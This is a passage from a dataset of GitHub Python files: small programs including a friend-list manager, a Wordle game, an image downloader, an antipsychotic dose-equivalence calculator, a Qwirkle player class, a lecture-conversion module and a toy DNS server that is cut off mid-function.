Number.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13582616195","text":"#친구 관리 프로그램 함수화\n\nprint('친구 관리 프로그램')\nprint('==========================')\nclist=[]\ndef show():\n print(clist) #global 처리 안해도되나?\n\ndef append():\n name= input('이름을 선택: ')\n clist.append(name)\n\ndef delete():\n name = input('삭제할 이름 입력: ')\n clist.remove(name)\n show()\n\ndef change():\n name = input('변경할 이름 선택: ')\n newname = input('변경하고 싶은 이름 입력: ')\n clist[clist.index(name)] = newname\n show()\n\ndef finish():\n print('종료')\n\nwhile True:\n print('1. 친구 리스트 출력')\n print('2. 친구 추가')\n print('3. 친구 삭제')\n print('4. 
이름 변경')\n print('9. 종료')\n num = int(input('메뉴를 선택: '))\n\n if num == 1:\n show()\n if num == 2:\n append()\n if num == 3:\n delete()\n if num == 4:\n change()\n if num == 9:\n finish()\n break\n print('------------------')","repo_name":"kmdn998/Acorn_Python","sub_path":"pycharm/controlProject/고객관리v1.py","file_name":"고객관리v1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71953616565","text":"# 신입 사원 선발\r\nimport sys\r\n\r\nm = sys.stdin.readline\r\n\r\ncase = int(m())\r\nanswer = []\r\n\r\nfor c in range(case):\r\n candidate = []\r\n num = int(m())\r\n plus = 1\r\n\r\n for _ in range(num):\r\n candidate.append(list(map(int, m().split())))\r\n \r\n candidate.sort()\r\n \r\n # 1등의 2번 등수\r\n standard = candidate[0][1]\r\n \r\n for c in candidate:\r\n # 2번 등수 높다 = 1개 부분이라도 순위 더 높음\r\n # 새로운 기준점\r\n if c[1] < standard:\r\n standard = c[1]\r\n plus += 1\r\n\r\n answer.append(plus)\r\n\r\nfor a in answer:\r\n print(a)","repo_name":"Chunws13/Study","sub_path":"Greedy/1946.py","file_name":"1946.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20217025066","text":"import utils\nimport re\ndef get_idea_package_direct_download_link():\n html_content = utils.download_html(\"https://www.jetbrains.com/intellij-repository/releases\")\n second_part=html_content.split(\"com.jetbrains.intellij.idea\")\n results = re.search(\"(?<=)([0-9]|\\.)*(?=)\", second_part[1])\n version = results[0]\n print(\"https://download.jetbrains.com/idea/ideaIC-\" + version + \".tar.gz\")\nif __name__ == \"__main__\":\n get_idea_package_direct_download_link()\n","repo_name":"rxue/linux_scripts","sub_path":"configuration/python/get_idea_package_direct_download_link.py","file_name":"get_idea_package_direct_download_link.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1602846459","text":"import os, re\nimport datetime\nfrom datetime import date\n\n# the directory where the csv file is located\nos.chdir(\"/workingdir/\")\n\n# output csv file\nimport csv\nwith open('output.csv', 'w', newline='', encoding = 'utf-8') as fcsv:\n fieldnames = ['patient', 'olzdose', 'totaldays']\n writer = csv.DictWriter(fcsv, fieldnames = fieldnames)\n \n writer.writeheader()\n \n fp = open(\"test.csv\")\n # initialising patiend id, which is data[1]\n patient = '7603594'\n # initialising olzdose & totaldays\n olzdose = 0.0\n temp_olzdose = 0.0\n avg_olzdose = 0.0\n totaldays = 0.0\n temp_days = 0.0\n dates = []\n prescription_date = date(2000,1,1)\n print(prescription_date)\n # [1:] for skipping the top row, if it has headers\n for line in fp.readlines()[1:]:\n data = line.split(',')\n print(data)\n # chemical name and dosage in mg\n # chemical names in the original dataset here = \n # ['Amisulpride', 'Aripiprazole', 'Blonanserin', 'Haloperidol', 'Olanzapine', 'Paliperidone', 'Quetiapine', 'Risperidon', Risperidon Disp, 'Risperidone', Risperidone Disp, 'Ziprasidone', 'Zyprexa' zydis*, Zyprexa Zydis*]\n # olanzapine equivalent doses were referenced from S Leucht et al., Schizophr Bull 2015;41(6):1397-1402\n drugs = {'Amisulpride':38.3, 'Aripiprazole':1.4, 'Blonanserin':1.6, 'Chlorpromazine':38.9, 'Clozapine':30.6, 'Haloperidol':0.7, 'Olanzapine':1.0, 'Paliperidone':0.6, 'Quetiapine':32.3, 'Risperidone':0.4, 'Ziprasidone':7.9, 
'Zotepine':13.2}\n names = data[7] ## <-- 'drug names' here\n # the first element on the list is the chemical name\n chemical = names.split(' ')\n if patient == data[1]: ## <-- 'patient ID' here\n if chemical[0] in drugs:\n # \\s: a space between chemical names and dosage, \\d: dosage, .{0,4}: whatever numbers or characters till 'mg'\n m1 = re.search('(\\s)(\\d+.{0,4})(mg)', data[7]) ## <-- 'drug names' here\n # taking numbers only and then converting into float\n dosage = float(m1.group(2))\n # totaltabs is the total number of prescribed tablets\n totaltabs = float(data[8]) ## <-- 'prescribed tabs per day' here\n temp_days = float(data[12]) ## <-- 'prescription days' here\n # skip the row if temp_days == 0\n if temp_days == 0:\n print(\"it is a prn medication: skipping the row\")\n continue\n # the total dosage = totaltabs multiplied by dosage per tab and prescribed days\n totaldose = dosage * totaltabs * temp_days\n # olzdose is olanzapine equivalent dosage of 'totaldose'\n olzdose = totaldose / drugs[chemical[0]]\n # if it is the same patient, sum up the olzdose till the next patient comes up\n temp_olzdose = temp_olzdose + olzdose\n # dates is a list of all the prescription dates in this patient\n # append the prescription date to the list 'dates'\n m2 = re.search('(\\d+)(\\-)(\\d+)(\\-)(\\d+)', data[6]) ## <-- 'prescription date' here\n # if it is prescribed on the same day, do not count temp_days\n if prescription_date == date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5))):\n totaldays = totaldays\n # otherwise, if it is a new prescription date, sum up temp_days to total days\n else:\n totaldays = totaldays + temp_days\n prescription_date = date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5)))\n dates.append(prescription_date)\n print(patient, 'totaldose', totaldose)\n print(patient, 'prescription_date', prescription_date)\n print(patient, 'temp_olzdose', temp_olzdose)\n print(patient, 'temp_days', temp_days)\n print(patient, 'totaldays', totaldays)\n print(patient, 'avg_olzdose', avg_olzdose)\n else:\n print('not antipsychotics')\n else:\n # if it is the next patient, calculate the average olzdose\n # totaldays = (max(dates)-min(dates)).days ## it is for inpatients maybe\n if totaldays == 0:\n #returns 0 as average dose when the patient got prescription for 0 day since divding with 0 returns error\n avg_olzdose = 0\n else:\n avg_olzdose = temp_olzdose / totaldays\n print('******************next patient*********************')\n # then write the patient ID and summed olzdose to the csv file\n writer.writerow({'patient': patient, 'olzdose': avg_olzdose, 'totaldays': totaldays})\n # and then initialise parameters for the next patient\n avg_olzdose = 0.0\n totaldays = 0.0\n temp_olzdose = 0.0\n dates = []\n patient = data[1] ## <-- 'patient ID' here\n # after initialising, process the first row of the next patient\n if chemical[0] in drugs:\n # \\s: a space between chemical names and dosage, \\d: dosage, .{0,4}: whatever numbers or characters till 'mg'\n m1 = re.search('(\\s)(\\d+.{0,4})(mg)', data[7]) ## <-- 'drug name' here\n # taking numbers only and then converting into float\n dosage = float(m1.group(2))\n # totaltabs is the total number of prescribed tablets\n totaltabs = float(data[8]) ## <-- 'prescribed tabs per day' here\n temp_days = float(data[12]) ## <-- 'prescription days' here\n # the total dosage = totaltabs multiplied by dosage per tab and prescribed days\n totaldose = dosage * totaltabs * temp_days\n # olzdose is olanzapine equivalent dosage of 'totaldose'\n 
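The dose handling in this record turns on one regex, `(\s)(\d+.{0,4})(mg)`, plus the equivalence table above. A stripped-down sketch of that parse-and-convert step; the function name is invented for illustration and only two table entries are copied from the record:

```python
import re

# Two olanzapine-equivalence factors copied from the table above.
EQUIV = {'Olanzapine': 1.0, 'Risperidone': 0.4}

def olanzapine_equivalent(prescription, tabs_per_day, days):
    """Olanzapine-equivalent total dose for one prescription row (sketch)."""
    chemical = prescription.split(' ')[0]
    m = re.search(r'(\s)(\d+.{0,4})(mg)', prescription)  # same pattern as above
    if chemical not in EQUIV or m is None:
        return None  # unknown drug, or no parsable "<number>mg" token
    dose_mg = float(m.group(2))
    return dose_mg * tabs_per_day * days / EQUIV[chemical]

print(olanzapine_equivalent('Risperidone 2mg', 2.0, 30.0))  # -> 300.0
```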
olzdose = totaldose / drugs[chemical[0]]\n # if it is the same patient, sum up the olzdose till the next patient comes up\n temp_olzdose = temp_olzdose + olzdose\n # dates is a list of all the prescription dates in this patient\n # append the prescription date to the list 'dates'\n m2 = re.search('(\\d+)(\\-)(\\d+)(\\-)(\\d+)', data[6]) ## <-- 'prescription date' here\n # if it is prescribed on the same day, do not count temp_days\n if prescription_date == date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5))):\n totaldays = totaldays\n # otherwise, if it is a new prescription date, sum up temp_days to total days\n else:\n totaldays = totaldays + temp_days\n prescription_date = date(int(m2.group(1)), int(m2.group(3)), int(m2.group(5)))\n dates.append(prescription_date)\n print(patient, 'totaldose', totaldose)\n print(patient, 'prescription_date', prescription_date)\n print(patient, 'temp_olzdose', temp_olzdose)\n print(patient, 'temp_days', temp_days)\n print(patient, 'totaldays', totaldays)\n print(patient, 'avg_olzdose', avg_olzdose)\n else:\n print('not antipsychotics')\n patient = data[1] ## <-- '환자번호' here\n # write the avg_olzdose of the last patient to the csv file\n avg_olzdose = temp_olzdose / totaldays\n writer.writerow({'patient': patient, 'olzdose': avg_olzdose, 'totaldays': totaldays})\n fp.close()\n","repo_name":"drjlee/antipsychotics-equivalent-dose-calculator","sub_path":"Med_dose_v3.py","file_name":"Med_dose_v3.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7951916270","text":"#!/usr/bin/python3\n\"\"\"\nFrom list in local text file download images, and save on local drive.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nimport urllib\nimport colorama\nfrom urllib.request import urlopen\nfrom multiprocessing import Pool\n\n\ndef input_parser():\n \"\"\"parse argument and and return input file\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', dest='input_file', required=True,\n help='input file with list')\n parser.add_argument('-o', dest='dst_dir', required=True,\n help='destination path')\n parser.add_argument('-n', dest=\"number_of_processes\", default=1, type=int,\n help=\"number of processes <=24\")\n\n return parser.parse_args()\n\n\ndef folder_creator(dst_dir):\n \"\"\"Create of output directory if not exists\"\"\"\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n print('Destination folder not exists and will be created')\n\n\ndef download_image(url, dst_dir):\n try:\n reply = urlopen(url)\n except urllib.error.HTTPError:\n print(colorama.Fore.RED + \"[!] 
404 NOT FOUND: {}\".format(url) + colorama.Fore.RESET)\n return None\n file_name = url_converter(url)\n src_file = os.path.join(dst_dir, file_name)\n print(\"Downloading file from {} ...\".format(url))\n print(\"Writing file to local path {}\".format(src_file))\n with open(src_file, 'wb+') as f:\n f.write(reply.read())\n\n\ndef url_converter(url):\n \"\"\"url returns resource name\"\"\"\n return url.split('/')[-1]\n\n\ndef get_hrefs(input_file):\n with open(input_file, 'r') as f:\n return [row for row in f.readlines() if row.strip() != '']\n\n\ndef image_downloader(url):\n try:\n download_image(url.strip(), dst_dir)\n except ValueError:\n print(\"Done, end of source list file : {}\".format(input_file))\n sys.exit(2)\n\n\nif __name__ == \"__main__\":\n args = input_parser()\n num_of_procs = args.number_of_processes\n input_file = args.input_file\n dst_dir = args.dst_dir\n\n if not input_file:\n sys.exit(2)\n\n folder_creator(dst_dir)\n\n images_list = get_hrefs(input_file)\n\n processes = Pool(num_of_procs)\n processes.map(image_downloader, images_list)\n\n processes.close()\n processes.join()\n\n # image_downloader(input_file, dst_dir)\n","repo_name":"mixer3d/mainprogram","sub_path":"mainprogram_multi.py","file_name":"mainprogram_multi.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22977699511","text":"import numpy as np\nfrom rl2048.utils import action_select, copy_data, variable\n\n\ndef test_action_select():\n\n x = variable((100, 4), type_='float')\n a = variable((100, ), type_='long')\n\n x_data = np.random.random(size=(100, 4))\n a_data = np.random.randint(0, 4, size=100)\n\n copy_data(a, a_data)\n copy_data(x, x_data)\n\n expected = x_data[range(100), a_data]\n computed = action_select(x, a).data.cpu().numpy()\n\n np.testing.assert_allclose(expected, computed)\n","repo_name":"vighneshbirodkar/rl2048","sub_path":"rl2048/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70002502965","text":"# Name: Jeanie Ho\r\n# UTEID: jth3929\r\n#\r\n# On my honor, , this programming assignment is my own work\r\n# and I have not provided this code to any other student.\r\n\r\n# secret words are actual answers, other valid words will not be picked\r\n# method for when user enters guess, check if its in sercret or others, update data structure to hold letters player has guessed and unguessed\r\n# while guess has not beeen create\r\nimport random\r\nimport string\r\n\r\n\r\ndef main():\r\n \"\"\" Plays a text based version of Wordle.\r\n 1. Read in the words that can be choices for the secret word\r\n and all the valid words. The secret words are a subset of\r\n the valid words.\r\n 2. Explain the rules to the player.\r\n 3. Get the random seed from the player if they want one.\r\n 4. Play rounds until the player wants to quit.\r\n \"\"\"\r\n secret_words, all_words = get_words()\r\n welcome_and_instructions()\r\n final_word = random.choice(secret_words)\r\n play_again = play(final_word, all_words)\r\n while (play_again):\r\n final_word = random.choice(secret_words)\r\n play_again = play(final_word, all_words)\r\n\r\n\r\n# def play(final_word, all_words):\r\n# \"\"\" Play a single round of Wordle.\r\n# 1. Get the user's guess.\r\n# 2. Check if the guess is valid.\r\n# 3. Check if the guess is correct.\r\n# 4. 
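In the downloader record above, `image_downloader` reads `dst_dir` from module scope because `Pool.map` hands each worker exactly one argument. A conventional alternative is to freeze the extra argument with `functools.partial`; a sketch with placeholder names and URLs, and no real network access:

```python
from functools import partial
from multiprocessing import Pool

def download_one(url, dst_dir):
    # Placeholder body: report what would happen instead of fetching.
    print(f"would fetch {url.strip()} into {dst_dir}")

if __name__ == "__main__":
    urls = ["http://example.com/a.png", "http://example.com/b.png"]
    with Pool(2) as pool:
        # partial() pins dst_dir, so each worker still receives one argument.
        pool.map(partial(download_one, dst_dir="images"), urls)
```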
If the guess is correct, print a message.\r\n# 5. Ask the user if they want to play again.\r\n# 'y,y,200,bEESt,bEAst,YEAST,bEETS,bEsET,y,gAUNT,gAMERs,gAMER,AUNTs,gauge,gregs,great,tears,no i dont want to'\r\n# \"\"\"\r\n# dict = {}\r\n# if (final_word[i] not in dict):\r\n# dict[final_word[i]] = 1\r\n# else:\r\n# dict[final_word[i]] += 1\r\n# alphabet = string.ascii_uppercase\r\n# found = False\r\n# prev_guesses = ''\r\n# tries = 0\r\n# while not found and tries < 6:\r\n# guess = input('\\nEnter your guess. A 5 letter word: ').strip().upper()\r\n# if (guess not in all_words):\r\n# print('\\n' + guess + ' is not a valid word. Please try again.')\r\n# continue\r\n# tries += 1\r\n# # make check a dictionary with the colors as keys and num times in final_word as values\r\n# check = ['-', '-', '-', '-', '-']\r\n# repeat = ''\r\n# repeat_o = ''\r\n# for i in range(len(guess)):\r\n# # remove guess[i] from alphabets\r\n# alphabet = alphabet.replace(guess[i], '')\r\n# # check if guess[i] is in alphabet to avoid duplicates\r\n# if (guess[i] == final_word[i]):\r\n# check[i] = 'G'\r\n# if (guess[i] in dict):\r\n# dict[guess[i]] -= 1\r\n# for j in range(i):\r\n# if (guess[j] == guess[i]):\r\n# check[j] = '-'\r\n# repeat = final_word[i]\r\n# elif (guess[i] in final_word and guess[i] != final_word[i] and guess[i] != repeat and guess[i] != repeat_o):\r\n# check[i] = 'O'\r\n# repeat_o = guess[i]\r\n# elif (guess[i] == repeat or guess[i] == repeat_o):\r\n# check[i] = '-'\r\n# if (guess == final_word):\r\n# check[i] = 'G'\r\n# prev_guesses += ('\\n' + ''.join(check) + '\\n' + guess)\r\n# print(prev_guesses)\r\n# print('\\n' + \"Unused letters: \" + ' '.join(alphabet))\r\n# if (guess == final_word):\r\n# found = True\r\n# print_message(tries, found, final_word)\r\n# play_again = input('\\nDo you want to play again? Type Y for yes: ').lower()\r\n# if (play_again == 'y'):\r\n# return True\r\n\r\n\r\ndef play(final_word, all_words):\r\n \"\"\" Play a single round of Wordle.\r\n 1. Get the user's guess.\r\n 2. Check if the guess is valid.\r\n 3. Check if the guess is correct.\r\n 4. If the guess is correct, print a message.\r\n 5. Ask the user if they want to play again.\r\n 'n,y,1313,oomph,orzos,mockoo,oTtoS,sHOOT,n'\r\n y,y,49,barbs,roara,roars,kites,kittens,knights,kribs,krocks,ricks,BRICk,nope\r\n \"\"\"\r\n orig_dict = {}\r\n for i in range(len(final_word)):\r\n if (final_word[i] not in orig_dict):\r\n orig_dict[final_word[i]] = 1\r\n else:\r\n orig_dict[final_word[i]] += 1\r\n alphabet = string.ascii_uppercase\r\n found = False\r\n prev_guesses = ''\r\n tries = 0\r\n while not found and tries < 6:\r\n dict = {}\r\n for i in range(len(final_word)):\r\n if (final_word[i] not in dict):\r\n dict[final_word[i]] = 1\r\n else:\r\n dict[final_word[i]] += 1\r\n guess = input('\\nEnter your guess. A 5 letter word: ').strip().upper()\r\n if (guess not in all_words):\r\n print('\\n' + guess + ' is not a valid word. 
Please try again.')\r\n continue\r\n tries += 1\r\n # make check a dictionary with the chars as keys and num times in final_word as values\r\n check = ['-', '-', '-', '-', '-']\r\n for i in range(len(guess)):\r\n # remove guess[i] from alphabets\r\n alphabet = alphabet.replace(guess[i], '')\r\n # check if guess[i] is in alphabet to avoid duplicates\r\n if (guess[i] == final_word[i]):\r\n check[i] = 'G'\r\n dict[guess[i]] -= 1\r\n for j in range(i):\r\n if (guess[j] == guess[i] and guess != final_word and dict[guess[i]] < 0):\r\n check[j] = '-'\r\n elif (guess[i] in final_word and guess[i] != final_word[i] and dict[guess[i]] > 0):\r\n check[i] = 'O'\r\n dict[guess[i]] -= 1\r\n prev_guesses += ('\\n' + ''.join(check) + '\\n' + guess)\r\n print(prev_guesses)\r\n print('\\n' + \"Unused letters: \" + ' '.join(alphabet))\r\n if (guess == final_word):\r\n found = True\r\n print_message(tries, found, final_word)\r\n play_again = input('\\nDo you want to play again? Type Y for yes: ').lower()\r\n if (play_again == 'y'):\r\n return True\r\n\r\n\r\ndef print_message(tries, found, final_word):\r\n \"\"\" Print a message to the player. \"\"\"\r\n if found:\r\n if tries == 1:\r\n print('\\nYou win. Genius!')\r\n elif tries == 2:\r\n print('\\nYou win. Magnificent!')\r\n elif tries == 3:\r\n print('\\nYou win. Impressive!')\r\n elif tries == 4:\r\n print('\\nYou win. Splendid!')\r\n elif tries == 5:\r\n print('\\nYou win. Great!')\r\n elif tries == 6:\r\n print('\\nYou win. Phew!')\r\n else:\r\n print('\\nNot quite. The secret word was ' + final_word + '.')\r\n\r\n\r\ndef welcome_and_instructions():\r\n \"\"\"\r\n Print the instructions and set the initial seed for the random\r\n number generator based on user input.\r\n \"\"\"\r\n print('Welcome to Wordle.')\r\n instructions = input('\\nEnter y for instructions, anything else to skip: ')\r\n if instructions == 'y':\r\n print('\\nYou have 6 chances to guess the secret 5 letter word.')\r\n print('Enter a valid 5 letter word.')\r\n print('Feedback is given for each letter.')\r\n print('G indicates the letter is in the word and in the correct spot.')\r\n print('O indicates the letter is in the word but not that spot.')\r\n print('- indicates the letter is not in the word.')\r\n set_seed = input(\r\n '\\nEnter y to set the random seed, anything else to skip: ')\r\n if set_seed == 'y':\r\n random.seed(int(input('\\nEnter number for initial seed: ')))\r\n\r\n\r\ndef get_words():\r\n \"\"\" Read the words from the dictionary files.\r\n We assume the two required files are in the current working directory.\r\n The file with the words that may be picked as the secret words is\r\n assumed to be named secret_words.txt. 
The file with the rest of the\r\n words that are valid user input but will not be picked as the secret\r\n word is assumed to be in a file named other_valid_words.txt.\r\n Returns a sorted tuple with the words that can be\r\n chosen as the secret word and a set with ALL the words,\r\n including both the ones that can be chosen as the secret word\r\n combined with other words that are valid user guesses.\r\n \"\"\"\r\n temp_secret_words = []\r\n with open('secret_words.txt', 'r') as data_file:\r\n all_lines = data_file.readlines()\r\n for line in all_lines:\r\n temp_secret_words.append(line.strip().upper())\r\n temp_secret_words.sort()\r\n secret_words = tuple(temp_secret_words)\r\n all_words = set(secret_words)\r\n with open('other_valid_words.txt', 'r') as data_file:\r\n all_lines = data_file.readlines()\r\n for line in all_lines:\r\n all_words.add(line.strip().upper())\r\n return secret_words, all_words\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jeanieho/Python","sub_path":"wordle_text.py","file_name":"wordle_text.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"30198105975","text":"from random import Random\nfrom termcolor import colored\nfrom tablero.exceptions import InvalidPlayException\n\n\nclass Jugador:\n # Constructor de objetos\n def __init__(self, nombre ='Unknown Player'):\n self.fichas = []\n self.puntuacion = 0\n self.nombre = nombre\n\n # Le asigna seis fichas iniciales de la bolsa de fichas al jugador\n def asignarFichas (self, bolsaFichas):\n rnd = Random()\n while len(self.fichas) < 6 and len(bolsaFichas) > 0:\n posRandom = rnd.randint(0, len(bolsaFichas) - 1) # elige aleatoriamente una posición del arreglo de fichas \n self.fichas.append(bolsaFichas.pop(posRandom)) # y la agrega a la mano del jugador\n\n # Permite que el jugador humano juegue su turno en el juego\n def jugarTurno(self, tablero):\n fichasJugador = self.fichas.copy()\n while True:\n print(self.mostrarFichasMano(fichasJugador))\n print (' Comandos:')\n print (' (r) reinicia la jugada')\n print (' (#Ficha) (ColumnaFila) por ejemplo: 1 A5')\n print (' (t) termina el turno')\n\n opcion = input (' -> ')\n print('\\n\\n\\n')\n\n if len(opcion) == 0: # si no selecciono nada se muestra la misma pantalla de nuevo\n continue \n\n if opcion == 'r': # se deshace cualquier jugada hecha y se muestran las fichas y tablero iniciales\n tablero.reiniciarTurno()\n fichasJugador = self.fichas.copy()\n tablero.imprimirTablero()\n continue\n\n if opcion == 't': # se termina el turno del jugador actual\n break\n \n try: # si el primer dato no es el identificador de una ficha se muestra el error\n indiceFicha = int (opcion[0]) - 1\n except ValueError:\n print (colored('El valor de la ficha elegida debe ser un valor numérico', 'red', attrs=['bold']), '\\n')\n continue\n\n if indiceFicha < 0 or indiceFicha >= len(fichasJugador): # la ficha elegida es mayor a la cantidad de fichas en la mano\n continue\n\n x, y = tablero.convertirCoordenada(opcion[2:].upper()) # convertimos el valor dado en un par ordenado\n try:\n tablero.jugar(fichasJugador[indiceFicha], x, y) # usa esta ficha en esta coordenada\n fichasJugador.pop(indiceFicha)\n except InvalidPlayException: # si la jugada no es válida mostramos el error\n print (colored('La jugada elegida no es válida', 'red', attrs=['bold']), '\\n')\n\n tablero.imprimirTablero()\n\n self.fichas = fichasJugador.copy()\n\n # Muestra las fichas que tiene un jugador en su mano\n @staticmethod\n 
def mostrarFichasMano(fichasMano):\n fichasEnMano = ''\n mensaje = ''\n for ficha in fichasMano:\n fichasEnMano += colored(ficha.figura, ficha.color) + ' '\n mensaje += '\\n Fichas del jugador: %s' % fichasEnMano\n mensaje += '\\n 1 2 3 4 5 6\\n'\n\n return mensaje\n\n def sumarPuntos(self, pPuntos):\n self.puntuacion += pPuntos\n\n def sinFichas(self):\n return len(self.fichas) == 0\n\n def vaciarFichas(self):\n self.fichas = []\n\n def getFichas(self):\n return self.fichas\n\n def getPuntuacion(self):\n return self.puntuacion\n\n def getNombre(self):\n return self.nombre\n\n","repo_name":"Heyler-Johel/Qwirkle_Solver-","sub_path":"jugador.py","file_name":"jugador.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}{"seq_id":"14279501189","text":"# vim: set expandtab sts=4 ts=4 sw=4:\n# This is free software, licensed under the LGPL v3. See the file \"COPYING\" for\n# details.\n#\n# (c) 2016-2017 Sebastian Humenda \n\"\"\"For documentation about this module, please refer to its class master.\"\"\"\n\nimport os\nfrom . import config\nfrom .config import MetaInfo\nfrom . import common\nfrom . import errors\nfrom . import filesystem\nfrom . import pandoc\nfrom . import toc\n\n\nclass Master:\n \"\"\"m = Master(path)\nm.run()\n\nTake a directory and perform breadth-first search to find the first\n.lecture_meta_data.dcxml. In this depth, all directories are scanned for this\nfile so that we actually have multiple roots (a forest). This is necessary for\nlectures containing e.g. lecture and exercise material. For each root the\nnavigation bar and the table of contents is generated; afterwards all MarkDown\nfiles are converted.\"\"\"\n\n def __init__(self, path, profile, output_format):\n if os.path.exists(path):\n if os.path.isfile(path):\n raise OSError(\"Operation can only be applied to directories.\")\n if common.is_valid_file(os.path.abspath(path)):\n raise errors.StructuralError(\n (\n \"The master command can only be called \"\n \"on a whole lecture, not on particular chapters.\"\n ),\n path,\n )\n self._roots = self.__findroot(path)\n self._profile = profile\n self._output_format = output_format\n\n def get_roots(self):\n return self._roots\n\n def __findroot(self, path):\n roots = []\n dirs = [path]\n go_deeper = True\n for directory in dirs:\n meta = [e for e in os.listdir(directory) if e == config.CONF_FILE_NAME]\n if meta: # found, this is our root\n roots.append(directory)\n go_deeper = False\n else:\n if go_deeper:\n dirs += [\n os.path.join(directory, e)\n for e in os.listdir(directory)\n if os.path.isdir(os.path.join(directory, e))\n ]\n found_md = any(\n fname.endswith(\".md\")\n for directory, _, flist in os.walk(path)\n for fname in flist\n )\n if not roots and found_md:\n # no root and markdown files present → lecture without configuration\n raise errors.ConfigurationError(\n (\"no configuration found, but it \" \"is required\"), path\n )\n return roots\n\n def get_translation(self, word, path):\n \"\"\"Return a translation for a word for a given path.\n Different paths might have different language configurations. This\n method loads the individual configuration.\"\"\"\n conf = config.ConfFactory().get_conf_instance(path)\n trans = config.Translate()\n trans.set_language(conf[MetaInfo.Language])\n return trans.get_translation(word)\n\n def run(self):\n \"\"\"This function should only be run from the lecture root. 
For other\n directories (subdirectories or unrelated directories) it will hopefully\n produce a meaningful error message, but this is *not* guaranteed.\n\n This function creates a navigation bar, the table of contents and\n converts all files. It will raise ConfigurationError when no\n configuration has been found and there are MarkDown files.\"\"\"\n try:\n self._run()\n except errors.ConfigurationError as e:\n if not e.path:\n e.path = self._roots[0]\n raise\n\n def _run(self):\n orig_cwd = os.getcwd()\n for root in self.get_roots():\n os.chdir(root)\n if self._output_format == pandoc.formats.OutputFormat.Html:\n conf = config.ConfFactory().get_conf_instance(\".\")\n if conf[MetaInfo.GenerateToc]:\n # create table of contents\n c = toc.HeadingIndexer(\".\")\n c.walk()\n if not c.is_empty():\n index = c.get_index()\n md_creator = toc.TocFormatter(index, \".\")\n with open(\"inhalt.md\", \"w\", encoding=\"utf-8\") as file:\n file.write(md_creator.format())\n\n conv = pandoc.converter.Pandoc(root_path=orig_cwd)\n files_to_convert = [\n os.path.join(dir, f)\n for dir, _, flist in filesystem.get_markdown_files(\".\", True)\n for f in flist\n ]\n conv.set_conversion_profile(self._profile)\n conv.set_output_format(self._output_format)\n conv.convert_files(files_to_convert)\n os.chdir(orig_cwd)\n","repo_name":"TUD-INF-IAI-MCI/AGSBS-infrastructure","sub_path":"MAGSBS/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"}{"seq_id":"26259994475","text":"import socket, glob, json\n\nHOST = \"127.0.0.1\"\nPORT = 53\ndomains_json = {}\n\n# RESPONSE PARAMETERS\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((HOST, PORT))\n\n\ndef load_zones():\n global domains_json\n zone_files = glob.glob(\"domains/*.domain\")\n for zone in zone_files:\n with open(zone) as zone_data:\n data = json.load(zone_data)\n domains_json[data[\"$origin\"]] = data\n return domains_json\n\n\ndef get_domain(data):\n expected_len = data[0]\n domain = \"\"\n current = 0\n question_type = \"\"\n for i, byte in enumerate(data):\n if byte == 0:\n question_type = data[i + 1: i + 3]\n break\n if i != 0:\n if current < expected_len:\n domain += chr(byte)\n current += 1\n else:\n domain += '.'\n expected_len = byte\n current = 0\n\n return domain, question_type\n\n\ndef get_records(domain, question_type):\n global domains_json\n try:\n domain_data = domains_json[domain]\n except KeyError as e:\n print(\"No such domain\")\n return None\n return domain_data[question_type]\n\n\ndef rec_to_bytes(recttl, recval):\n record = b\"\\xc0\\x0c\"\n record += bytes([0]) + bytes([1])\n record += bytes([0]) + bytes([1])\n record += int(recttl).to_bytes(4, byteorder='big')\n record += bytes([0]) + bytes([4])\n for part in recval.split('.'):\n record += bytes([int(part)])\n return record\n\n\ndef build_response(data):\n ID = \"\"\n QR = '1'\n OPCODE = \"\"\n AA = '1'\n TC = '0'\n RD = '0'\n RA = '0'\n Z = \"000\"\n RCODE = \"0000\"\n QDCOUNT = b\"\\x00\\x01\"\n\n for i, byte in enumerate(data):\n if i in [0, 1]:\n ID += format(byte, '02x') # keep leading zeros of each header byte\n if i == 2:\n for bit in range(1, 5):\n OPCODE += str((byte >> (7 - bit)) & 1) # opcode bits, MSB first\n\n ID = int(ID, 16).to_bytes(2, byteorder='big')\n byte_1 = int(QR + OPCODE + AA + TC + RD, 2).to_bytes(1, byteorder='big')\n byte_2 = int(RA + Z + RCODE, 2).to_bytes(1, byteorder='big')\n domain, question_type = get_domain(data[12:])\n records = get_records(domain, \"a\")\n if records is None:\n return 
